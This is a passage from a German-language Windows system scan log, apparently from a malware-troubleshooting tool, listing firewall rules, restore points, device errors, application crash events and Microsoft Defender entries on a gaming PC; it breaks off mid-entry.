FirewallRules: [{FFEFCEA8-51C9-4CDB-95FE-87CD64865405}] => (Allow) C:\Program Files\Samsung\Easy Connection to Screen\Service.exe (Samsung Electronics CO., LTD. -> )
FirewallRules: [{819EEF0C-A66D-4B13-AE52-372B8C4417FB}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{6EC5B841-2D65-462E-9D98-09F39BF628D5}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{04D75BF3-9460-4D0A-A4D7-1502C365E3EB}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{2B271BC7-FE06-49D7-93DA-536ED922681D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{95213788-1B97-4E49-8189-1432C240E150}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aperture Tag\portal2.exe () [Datei ist nicht signiert]
FirewallRules: [{16C58C8B-DA6D-4D0F-97AC-FD14D27CA572}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aperture Tag\portal2.exe () [Datei ist nicht signiert]
FirewallRules: [TCP Query User{AAC4AA3C-68A2-426C-BD58-B78451E1793A}C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-gamma\windows-x64\java-runtime-gamma\bin\javaw.exe] => (Allow) C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-gamma\windows-x64\java-runtime-gamma\bin\javaw.exe
FirewallRules: [UDP Query User{AEAE6F33-1ACA-4DBB-AA21-50BDD5B17F14}C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-gamma\windows-x64\java-runtime-gamma\bin\javaw.exe] => (Allow) C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-gamma\windows-x64\java-runtime-gamma\bin\javaw.exe
FirewallRules: [TCP Query User{AC1AEE34-F90D-4E27-B0D4-D2DEE7CF7E78}C:\program files\ultimaker cura 5.5.0\ultimaker-cura.exe] => (Allow) C:\program files\ultimaker cura 5.5.0\ultimaker-cura.exe () [Datei ist nicht signiert]
FirewallRules: [UDP Query User{9F13C120-86C8-42E2-9742-08ED00FDBAC4}C:\program files\ultimaker cura 5.5.0\ultimaker-cura.exe] => (Allow) C:\program files\ultimaker cura 5.5.0\ultimaker-cura.exe () [Datei ist nicht signiert]
FirewallRules: [TCP Query User{F520C8E2-BCBB-4F84-A5CF-357018C357BF}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{F129C453-4F2D-4BD8-B594-1AE517108017}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [{A3C56F05-23E8-4FBE-BAE7-3EAD3BDCDA59}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Stanley Parable Demo\stanley.exe () [Datei ist nicht signiert]
FirewallRules: [{9316E500-E48D-40C8-BE89-35370F8AEA0A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Stanley Parable Demo\stanley.exe () [Datei ist nicht signiert]
FirewallRules: [{FB6F5ACB-1BA6-45E0-B74E-3848DB024352}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Stanley Parable Ultra Deluxe\The Stanley Parable Ultra Deluxe.exe () [Datei ist nicht signiert]
FirewallRules: [{09E7C842-072A-45C2-8F46-7E202AE6B99C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Stanley Parable Ultra Deluxe\The Stanley Parable Ultra Deluxe.exe () [Datei ist nicht signiert]
FirewallRules: [{3EC9FD54-2CE9-4DEB-AC1F-B5DFE8FB748A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal Revolution\bin\win64\revolution.exe () [Datei ist nicht signiert]
FirewallRules: [{0DCF3680-70CB-4AAA-B4F1-478E827B6903}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal Revolution\bin\win64\revolution.exe () [Datei ist nicht signiert]
FirewallRules: [{E9F41C2D-B88D-46AE-A78F-2E76847FACFF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal 2\portal2.exe () [Datei ist nicht signiert]
FirewallRules: [{4D08CEFB-4146-495A-9F61-F321D1D68C0D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal 2\portal2.exe () [Datei ist nicht signiert]
FirewallRules: [{99F1FB24-4658-42E8-99EA-E1B8507D003E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal Reloaded\portal2.exe () [Datei ist nicht signiert]
FirewallRules: [{DC4421FF-EC22-4B4C-807A-FC9CB95626BB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal Reloaded\portal2.exe () [Datei ist nicht signiert]
FirewallRules: [TCP Query User{A1FC9D33-19D1-4E27-A949-4C10690A1528}C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Allow) C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [UDP Query User{5F74F7B2-BF81-47D2-B13F-707AE86FDBE8}C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Allow) C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [TCP Query User{D492A8E2-81AE-41DF-9811-A0F149828BC1}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{BB605A84-C0DF-4936-95F4-9C997F707D24}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [{BE492809-23CE-4298-A28D-623B9622E14F}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_24060.3102.2733.5911_x64__8wekyb3d8bbwe\msteams.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{059405E0-5C48-4963-BADB-E888432AE375}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_24060.3102.2733.5911_x64__8wekyb3d8bbwe\msteams.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{03AE9F99-E45E-4247-AD70-668379C0C9A8}C:\users\skysc\curseforge\minecraft\install\runtime\jre-legacy\windows-x64\jre-legacy\bin\javaw.exe] => (Allow) C:\users\skysc\curseforge\minecraft\install\runtime\jre-legacy\windows-x64\jre-legacy\bin\javaw.exe
FirewallRules: [UDP Query User{191C35FA-6BF8-4795-A7B3-962E74C79BD7}C:\users\skysc\curseforge\minecraft\install\runtime\jre-legacy\windows-x64\jre-legacy\bin\javaw.exe] => (Allow) C:\users\skysc\curseforge\minecraft\install\runtime\jre-legacy\windows-x64\jre-legacy\bin\javaw.exe
FirewallRules: [TCP Query User{0EF41AE0-12CC-467C-BADA-19A8DEBDFE53}C:\users\skysc\appdata\roaming\twitch studio\bin\twitchstudioagent.exe] => (Allow) C:\users\skysc\appdata\roaming\twitch studio\bin\twitchstudioagent.exe => Keine Datei
FirewallRules: [UDP Query User{67777DE3-C231-445A-BAC1-5F12FCEB141D}C:\users\skysc\appdata\roaming\twitch studio\bin\twitchstudioagent.exe] => (Allow) C:\users\skysc\appdata\roaming\twitch studio\bin\twitchstudioagent.exe => Keine Datei
FirewallRules: [{9C536DC2-21BB-4CE5-AF43-D5CD1A611D79}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa\iTunes.exe (5BD5593D-A41B-4F89-884E-B4F3E0FBAA75 -> Apple Inc.)
FirewallRules: [{8B5CC2F8-BED7-4A43-AC52-8FF6349C25AF}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa\iTunes.exe (5BD5593D-A41B-4F89-884E-B4F3E0FBAA75 -> Apple Inc.)
FirewallRules: [{186D8BBB-DFF8-4FD4-BF74-5A4BB204AF23}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa\iTunes.exe (5BD5593D-A41B-4F89-884E-B4F3E0FBAA75 -> Apple Inc.)
FirewallRules: [{26A85371-1429-487A-80C8-D24441260E6A}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa\iTunes.exe (5BD5593D-A41B-4F89-884E-B4F3E0FBAA75 -> Apple Inc.)
FirewallRules: [{E246D769-511C-40AB-9AEF-F784838F32FD}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (5BD5593D-A41B-4F89-884E-B4F3E0FBAA75 -> Apple Inc.)
FirewallRules: [{5CC1D32F-52D6-4273-952E-19BEB207E296}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (5BD5593D-A41B-4F89-884E-B4F3E0FBAA75 -> Apple Inc.)
FirewallRules: [{B7EACA3F-40CC-465E-AEDA-BA510D925730}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (5BD5593D-A41B-4F89-884E-B4F3E0FBAA75 -> Apple Inc.)
FirewallRules: [{B0A2CC8C-A43B-4514-AECD-52DD1E3FBD77}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (5BD5593D-A41B-4F89-884E-B4F3E0FBAA75 -> Apple Inc.)
FirewallRules: [{7D0812B6-5D0F-40E6-A517-0689AECB4A7C}] => (Allow) C:\Program Files\PowerToys\PowerToys.MouseWithoutBorders.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{C43E0354-F7A6-43B9-8E57-467E287C9965}] => (Allow) C:\Program Files (x86)\Overwolf\0.254.0.12\OverwolfBrowser.exe => Keine Datei
FirewallRules: [{38036F52-FBF2-4B5D-9BCF-9CA728E4AAB4}] => (Allow) C:\Program Files (x86)\Overwolf\0.254.0.12\OverwolfBrowser.exe => Keine Datei
FirewallRules: [{C1E51BF4-2B1F-4611-BF0F-BCFD2C14D1CB}] => (Block) C:\Program Files (x86)\Overwolf\0.254.0.12\OverwolfBrowser.exe => Keine Datei
FirewallRules: [{F232B7A7-34E6-40DD-B53F-834BC9B7B89C}] => (Block) C:\Program Files (x86)\Overwolf\0.254.0.12\OverwolfBrowser.exe => Keine Datei
FirewallRules: [{7B9B44BA-FBDC-45E3-9BE0-243F34F9722D}] => (Allow) C:\Program Files (x86)\Overwolf\0.254.0.13\OverwolfBrowser.exe (Overwolf Ltd -> Overwolf LTD)
FirewallRules: [{0A0DCC37-A8F6-4799-BC0E-CF3EC9CD8988}] => (Allow) C:\Program Files (x86)\Overwolf\0.254.0.13\OverwolfBrowser.exe (Overwolf Ltd -> Overwolf LTD)
FirewallRules: [{FDE41B83-5853-4D9C-BF0E-26ABAB316FCA}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{C76B59C9-75A2-480D-8E78-A7C609270920}] => (Allow) C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe (Brave Software, Inc. -> Brave Software, Inc.)
FirewallRules: [{65361A39-314F-4045-BE67-9D049DDDBB6C}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.113\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{C45B4906-B767-4668-BBE6-BAF7410971E1}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{E1135128-0AB2-4225-87A3-1C23586CA1AF}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{D258953C-9615-4ABB-8505-DE2382165AE3}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{B566703B-0F9E-4CF3-95E7-C8942095906C}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{DC2864B3-59E4-4748-95D8-BE2BD6C00B9F}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{8C681889-1E2F-499E-AF19-1B61798346E1}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{64DA0766-AC96-4B28-BF47-B81EE1A3B036}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{022B2104-48BB-401B-ACEC-F8458664D7BC}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{D5CF90E8-3235-4B34-8733-336BA49A9529}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{C4CB79B6-2B8D-4D7A-9FC2-1466C3EEFB1C}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{F128A7E7-6C38-46B9-B2D1-4F41FAC84F79}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe () [Datei ist nicht signiert]
FirewallRules: [{01069CDF-BFED-4883-B436-B219979AC740}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe () [Datei ist nicht signiert]
FirewallRules: [TCP Query User{5E40FAB9-8B7F-430A-8E84-083ED550DF39}C:\users\skysc\appdata\local\programs\launcher\lunar client.exe] => (Allow) C:\users\skysc\appdata\local\programs\launcher\lunar client.exe (Moonsworth, LLC -> Moonsworth LLC)
FirewallRules: [UDP Query User{F56FAB9B-93B8-4354-9405-3CCDB309D519}C:\users\skysc\appdata\local\programs\launcher\lunar client.exe] => (Allow) C:\users\skysc\appdata\local\programs\launcher\lunar client.exe (Moonsworth, LLC -> Moonsworth LLC)
FirewallRules: [{30A22C5C-2C44-47C9-82D3-EE3A68C4609D}] => (Allow) LPort=32683
FirewallRules: [{328C1465-ABBE-4C6B-98D4-C01A68A16288}] => (Allow) LPort=26822
==================== Wiederherstellungspunkte =========================
17-07-2024 19:25:24 ScanGuard-Installation
18-07-2024 16:44:58 Revo Uninstaller's restore point - SpyHunter 5
18-07-2024 16:46:51 Revo Uninstaller's restore point - AVG AntiVirus Free
20-07-2024 14:38:51 Revo Uninstaller's restore point - ScanGuard
21-07-2024 13:51:58 Revo Uninstaller's restore point - ReMouse Standard
==================== Fehlerhafte Geräte im Gerätemanager ============
Name: GENERAL WEBCAM
Description: USB-Videogerät
Class Guid: {ca3e7ab9-b4c3-4ae6-8251-579ef933890f}
Manufacturer: Microsoft
Service: usbvideo
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
==================== Fehlereinträge in der Ereignisanzeige: ========================
Applikationsfehler:
==================
Error: (07/22/2024 05:28:50 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Users\skysc\AppData\Local\CapCut\CapCut.exe". Fehler in Manifest- oder Richtliniendatei "" in Zeile .
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22621.3672_none_6ec0f0a887fe525b.manifest.
Komponente 2: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22621.3672_none_2713b9d173822955.manifest.
Error: (07/22/2024 05:28:50 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Users\skysc\AppData\Local\CapCut\CapCut.exe". Fehler in Manifest- oder Richtliniendatei "" in Zeile .
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22621.3672_none_6ec0f0a887fe525b.manifest.
Komponente 2: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22621.3672_none_2713b9d173822955.manifest.
Error: (07/22/2024 04:11:54 PM) (Source: Application Error) (EventID: 1000) (User: SKYSGAMINGPC-CA)
Description: Name der fehlerhaften Anwendung: MSI_GamebarTool.exe, Version: 2.0.0.11, Zeitstempel: 0xd36e1d1f
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.22621.3880, Zeitstempel: 0xdb9989e8
Ausnahmecode: 0xe0434352
Fehleroffset: 0x000000000005fabc
ID des fehlerhaften Prozesses: 0x0x2104
Startzeit der fehlerhaften Anwendung: 0x0x1dadc4109750844
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\MSI\MSI Companion\MSI_GamebarTool.exe
Pfad des fehlerhaften Moduls: C:\Windows\System32\KERNELBASE.dll
Berichtskennung: 5eee3519-d3f1-4ffb-b485-885c2e0fe209
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (07/22/2024 04:11:53 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Anwendung: MSI_GamebarTool.exe
Frameworkversion: v4.0.30319
Beschreibung: Der Prozess wurde aufgrund einer unbehandelten Ausnahme beendet.
Ausnahmeinformationen: System.IO.FileNotFoundException
bei WpfApp10.App.Application_Startup(System.Object, System.Windows.StartupEventArgs)
bei System.Windows.Application.OnStartup(System.Windows.StartupEventArgs)
bei System.Windows.Application.<.ctor>b__1_0(System.Object)
bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32)
bei System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate)
bei System.Windows.Threading.DispatcherOperation.InvokeImpl()
bei MS.Internal.CulturePreservingExecutionContext.CallbackWrapper(System.Object)
bei System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
bei MS.Internal.CulturePreservingExecutionContext.Run(MS.Internal.CulturePreservingExecutionContext, System.Threading.ContextCallback, System.Object)
bei System.Windows.Threading.DispatcherOperation.Invoke()
bei System.Windows.Threading.Dispatcher.ProcessQueue()
bei System.Windows.Threading.Dispatcher.WndProcHook(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef)
bei MS.Win32.HwndWrapper.WndProc(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef)
bei MS.Win32.HwndSubclass.DispatcherCallbackOperation(System.Object)
bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32)
bei System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate)
bei System.Windows.Threading.Dispatcher.LegacyInvokeImpl(System.Windows.Threading.DispatcherPriority, System.TimeSpan, System.Delegate, System.Object, Int32)
bei MS.Win32.HwndSubclass.SubclassWndProc(IntPtr, Int32, IntPtr, IntPtr)
bei MS.Win32.UnsafeNativeMethods.DispatchMessage(System.Windows.Interop.MSG ByRef)
bei System.Windows.Threading.Dispatcher.PushFrameImpl(System.Windows.Threading.DispatcherFrame)
bei System.Windows.Application.RunDispatcher(System.Object)
bei System.Windows.Application.RunInternal(System.Windows.Window)
bei WpfApp10.App.Main()
Error: (07/22/2024 03:43:34 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Users\skysc\AppData\Local\CapCut\CapCut.exe". Fehler in Manifest- oder Richtliniendatei "" in Zeile .
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22621.3672_none_6ec0f0a887fe525b.manifest.
Komponente 2: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22621.3672_none_2713b9d173822955.manifest.
Error: (07/22/2024 02:39:37 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: SKYSGAMINGPC-CA)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\Windows\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).
Error: (07/22/2024 02:39:31 PM) (Source: Application Error) (EventID: 1000) (User: SKYSGAMINGPC-CA)
Description: Name der fehlerhaften Anwendung: MSI_GamebarTool.exe, Version: 2.0.0.11, Zeitstempel: 0xd36e1d1f
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.22621.3880, Zeitstempel: 0xdb9989e8
Ausnahmecode: 0xe0434352
Fehleroffset: 0x000000000005fabc
ID des fehlerhaften Prozesses: 0x0x20bc
Startzeit der fehlerhaften Anwendung: 0x0x1dadc342b3a6acc
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\MSI\MSI Companion\MSI_GamebarTool.exe
Pfad des fehlerhaften Moduls: C:\Windows\System32\KERNELBASE.dll
Berichtskennung: 028ee171-1257-45da-bc76-6b0712be39ff
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (07/22/2024 02:39:24 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Anwendung: MSI_GamebarTool.exe
Frameworkversion: v4.0.30319
Beschreibung: Der Prozess wurde aufgrund einer unbehandelten Ausnahme beendet.
Ausnahmeinformationen: System.IO.FileNotFoundException
bei WpfApp10.App.Application_Startup(System.Object, System.Windows.StartupEventArgs)
bei System.Windows.Application.OnStartup(System.Windows.StartupEventArgs)
bei System.Windows.Application.<.ctor>b__1_0(System.Object)
bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32)
bei System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate)
bei System.Windows.Threading.DispatcherOperation.InvokeImpl()
bei MS.Internal.CulturePreservingExecutionContext.CallbackWrapper(System.Object)
bei System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
bei MS.Internal.CulturePreservingExecutionContext.Run(MS.Internal.CulturePreservingExecutionContext, System.Threading.ContextCallback, System.Object)
bei System.Windows.Threading.DispatcherOperation.Invoke()
bei System.Windows.Threading.Dispatcher.ProcessQueue()
bei System.Windows.Threading.Dispatcher.WndProcHook(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef)
bei MS.Win32.HwndWrapper.WndProc(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef)
bei MS.Win32.HwndSubclass.DispatcherCallbackOperation(System.Object)
bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32)
bei System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate)
bei System.Windows.Threading.Dispatcher.LegacyInvokeImpl(System.Windows.Threading.DispatcherPriority, System.TimeSpan, System.Delegate, System.Object, Int32)
bei MS.Win32.HwndSubclass.SubclassWndProc(IntPtr, Int32, IntPtr, IntPtr)
bei MS.Win32.UnsafeNativeMethods.DispatchMessage(System.Windows.Interop.MSG ByRef)
bei System.Windows.Threading.Dispatcher.PushFrameImpl(System.Windows.Threading.DispatcherFrame)
bei System.Windows.Application.RunDispatcher(System.Object)
bei System.Windows.Application.RunInternal(System.Windows.Window)
bei WpfApp10.App.Main()
Systemfehler:
=============
Error: (07/22/2024 04:13:24 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet:
Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung.
Error: (07/22/2024 04:13:24 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst Google Update-Dienst (gupdate) erreicht.
Error: (07/22/2024 04:11:23 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "GameInput Service" wurde unerwartet beendet. Dies ist bereits 6 Mal passiert.
Error: (07/22/2024 04:11:23 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "GameInput Service" wurde mit folgendem Fehler beendet:
Die Verbunddatei "GameInput Service" wurde mit einer neueren Version erstellt.
Error: (07/22/2024 04:11:22 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "GameInput Service" wurde unerwartet beendet. Dies ist bereits 5 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 1000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (07/22/2024 04:11:22 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "GameInput Service" wurde mit folgendem Fehler beendet:
Die Verbunddatei "GameInput Service" wurde mit einer neueren Version erstellt.
Error: (07/22/2024 04:11:21 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "GameInput Service" wurde unerwartet beendet. Dies ist bereits 4 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 1000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (07/22/2024 04:11:21 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "GameInput Service" wurde mit folgendem Fehler beendet:
Die Verbunddatei "GameInput Service" wurde mit einer neueren Version erstellt.
Windows Defender:
================
Date: 2024-07-22 17:28:46
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {7AC7B037-E956-44C8-9B4C-DB9240EE71AB}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM
Date: 2024-07-21 13:35:58
Description:
C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe wurde durch den überwachten Ordnerzugriff daran gehindert, %userprofile%\OneDrive\Microsoft Edge Drop Files\Dokumente zu ändern.
Erkennungszeit: 2024-07-21T11:35:58.436Z
Benutzer: SKYSGAMINGPC-CA\skysc
Pfad: %userprofile%\OneDrive\Microsoft Edge Drop Files\Dokumente
Prozessname: C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe
Sicherheitsversion: 1.415.215.0
Modulversion: 1.1.24060.5
Produktversion: 4.18.24060.7
Date: 2024-07-20 15:26:46
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {B889A637-0393-4E52-937D-977966347CE0}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM
Date: 2024-07-20 14:46:03
Description:
